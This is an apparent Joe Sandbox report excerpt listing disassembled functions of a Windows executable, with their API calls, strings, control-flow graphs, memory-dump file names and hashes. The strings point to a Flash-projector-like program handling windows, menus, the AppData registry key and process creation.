                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-761530088
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65
                                                                                                                                                                                                                                                                                                                          Function 004D5D20 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 284COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 590 4d5d20-4d5d40 call 435350 593 4d6069-4d6073 590->593 594 4d5d46-4d5d56 call 435400 590->594 597 4d5d58-4d5d6f DestroyWindow 594->597 598 4d5d72-4d5d82 call 435400 594->598 601 4d5dab-4d5dbb call 435400 598->601 602 4d5d84-4d5da8 call 4d5380 call 4db4e0 598->602 608 4d5dbd-4d5dec call 4d5380 call 4a7ac0 601->608 609 4d5def-4d5dff call 435400 601->609 616 4d5fdc-4d5fec call 435400 609->616 617 4d5e05-4d5e12 609->617 628 4d5fee-4d602f call 4d5380 GetMenu call 4dad30 616->628 629 4d6032-4d6042 call 435400 616->629 620 4d5e14-4d5e16 617->620 621 4d5e41-4d5e55 GetModuleFileNameA 617->621 625 4d5e1c-4d5e1e 620->625 626 4d5e18-4d5e1a 620->626 622 4d605c-4d6066 621->622 623 4d5e5b-4d5e5c 621->623 623->622 627 4d5e62-4d5e69 623->627 631 4d5e24-4d5e26 625->631 632 4d5e20-4d5e22 625->632 626->625 630 4d5e38-4d5e3f 626->630 633 4d5e6b-4d5e6e 627->633 634 4d5e80-4d5e82 627->634 629->593 647 4d6044-4d6056 call 4d5380 629->647 630->620 630->621 637 4d5e2c-4d5e2e 631->637 638 4d5e28-4d5e2a 631->638 632->630 632->631 633->634 639 4d5e70-4d5e71 633->639 634->622 641 4d5e88-4d5e92 634->641 637->630 643 4d5e30-4d5e32 637->643 638->630 638->637 639->627 644 4d5e73-4d5e7d 639->644 646 4d5e95-4d5e9a 641->646 643->622 643->630 646->646 649 4d5e9c-4d5ec2 call 52b380 * 2 646->649 647->622 656 4d5fbf-4d5fd9 call 439d00 * 2 649->656 657 4d5ec8-4d5eca 649->657 657->656 658 4d5ed0-4d5eda 657->658 660 4d5ee0-4d5ee8 658->660 660->660 663 4d5eea-4d5eed 660->663 665 4d5ef0-4d5ef6 663->665 665->665 666 4d5ef8-4d5f20 665->666 667 4d5f22-4d5f2a 666->667 667->667 668 4d5f2c-4d5f30 667->668 669 4d5f33-4d5f39 668->669 669->669 670 4d5f3b-4d5f4d 669->670 671 4d5f50-4d5f55 670->671 671->671 672 4d5f57-4d5f5d 671->672 673 4d5f60-4d5f66 672->673 673->673 674 4d5f68-4d5fb9 CreateProcessA 673->674 674->656
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                          • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                                                                                                                                                                                          • API String ID: 3375834691-1928458085
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9
                                                                                                                                                                                                                                                                                                                          Function 004DB4E0 Relevance: 22.7, APIs: 15, Instructions: 180windowCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3087884050-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                                          • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65
                                                                                                                                                                                                                                                                                                                          Function 004CFE40 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 164registryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 730 4cfe40-4cfe62 731 4cfe68-4cfe6d call 497d20 730->731 732 4cffe0-4cfffd RegOpenKeyExA 730->732 739 4cfe6f call 4cb0e0 731->739 734 4cffff-4d002b RegQueryValueExA 732->734 735 4d0049-4d0059 732->735 737 4d002d-4d0039 call 435020 734->737 738 4d003e-4d0042 734->738 737->738 741 4d0043 RegCloseKey 738->741 742 4cfe74-4cfe76 739->742 741->735 743 4cfe7c-4cfe99 RegOpenKeyExW 742->743 744 4cff3f-4cff5c RegOpenKeyExA 742->744 743->735 745 4cfe9f-4cfecb RegQueryValueExW 743->745 744->735 746 4cff62-4cff8e RegQueryValueExA 744->746 745->738 747 4cfed1-4cfee3 call 4b8350 745->747 748 4cffd9-4cffde 746->748 749 4cff90-4cff93 746->749 747->738 757 4cfee9-4cfeec 747->757 748->741 751 4cffc8-4cffd4 call 435020 749->751 752 4cff95-4cffa9 call 4b8440 749->752 751->748 752->748 758 4cffab-4cffc6 call 435020 call 439d00 752->758 759 4cfeee-4cff04 call 435020 call 439d00 757->759 760 4cff09-4cff1e call 4d9d70 call 439d00 757->760 758->741 759->738 760->738 773 4cff24-4cff3a call 435020 call 439d00 760->773 773->738
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFE8F
                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFEC1
                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFF52
                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFF84
                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFFF3
                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004D0021
                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004D0043
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                                                                                                                                                                                          • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                                                                                                          • API String ID: 3944000476-502054578
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA
                                                                                                                                                                                                                                                                                                                          Function 004F5FC0 Relevance: 17.8, APIs: 14, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 949 4f5fc0-4f5fd7 950 4f5fdd-4f5ff0 call 4f5cb0 949->950 951 4f6093-4f6095 949->951 960 4f605d-4f6065 950->960 961 4f5ff2-4f6058 call 4fe010 950->961 952 4f60f7-4f60f9 951->952 953 4f6097-4f609f 951->953 955 4f60ff-4f6101 952->955 956 4f61a1 952->956 957 4f60b2-4f60ba 953->957 958 4f60a1-4f60a6 953->958 962 4f6107-4f6148 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection call 4f2bf0 955->962 963 4f62e5-4f62ec 955->963 956->963 965 4f61a7-4f61a9 956->965 957->952 966 4f60bc-4f60be 957->966 958->957 964 4f60a8-4f60b0 958->964 960->951 968 4f6067-4f607c EnterCriticalSection 960->968 961->960 979 4f614a 962->979 980 4f6167-4f6174 call 4f2bf0 962->980 964->957 964->966 965->963 970 4f61af-4f61c2 call 4f24f0 965->970 971 4f60d3 966->971 972 4f60c0-4f60c5 966->972 973 4f607e 968->973 974 4f6085-4f608d LeaveCriticalSection 968->974 985 4f624e-4f625b call 4f24f0 970->985 986 4f61c8-4f61ce 970->986 978 4f60d9-4f60f2 call 4e5ec0 971->978 972->971 977 4f60c7-4f60d1 972->977 973->974 974->951 977->971 977->978 978->952 984 4f6150-4f6165 call 4f3d00 call 4f2bf0 979->984 980->963 995 4f617a 980->995 984->980 985->963 1001 4f6261 985->1001 987 4f61d0-4f61df EnterCriticalSection 986->987 992 4f61e6-4f61ef 987->992 993 4f61e1 987->993 998 4f6201-4f620a 992->998 999 4f61f1-4f61ff 992->999 993->992 1000 4f6180-4f6195 call 4f3d00 call 4f2bf0 995->1000 1003 4f6211-4f622b LeaveCriticalSection EnterCriticalSection 998->1003 999->1003 1021 4f6197-4f619e 1000->1021 1005 4f6267-4f6276 EnterCriticalSection 1001->1005 1007 4f622d-4f6233 1003->1007 1008 4f6240-4f624c LeaveCriticalSection 1003->1008 1010 4f627d-4f6286 1005->1010 1011 4f6278 1005->1011 1014 4f623a-4f623d 1007->1014 1015 4f6235-4f6238 1007->1015 1008->985 1008->987 1012 4f6298-4f62a1 1010->1012 1013 4f6288-4f6296 1010->1013 1011->1010 1017 4f62a8-4f62c2 LeaveCriticalSection EnterCriticalSection 1012->1017 1013->1017 1014->1008 1015->1008 1019 4f62d7-4f62e3 LeaveCriticalSection 1017->1019 1020 4f62c4-4f62ca 1017->1020 1019->963 1019->1005 1022 4f62cc-4f62cf 1020->1022 1023 4f62d1-4f62d4 1020->1023 1022->1019 1023->1019
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
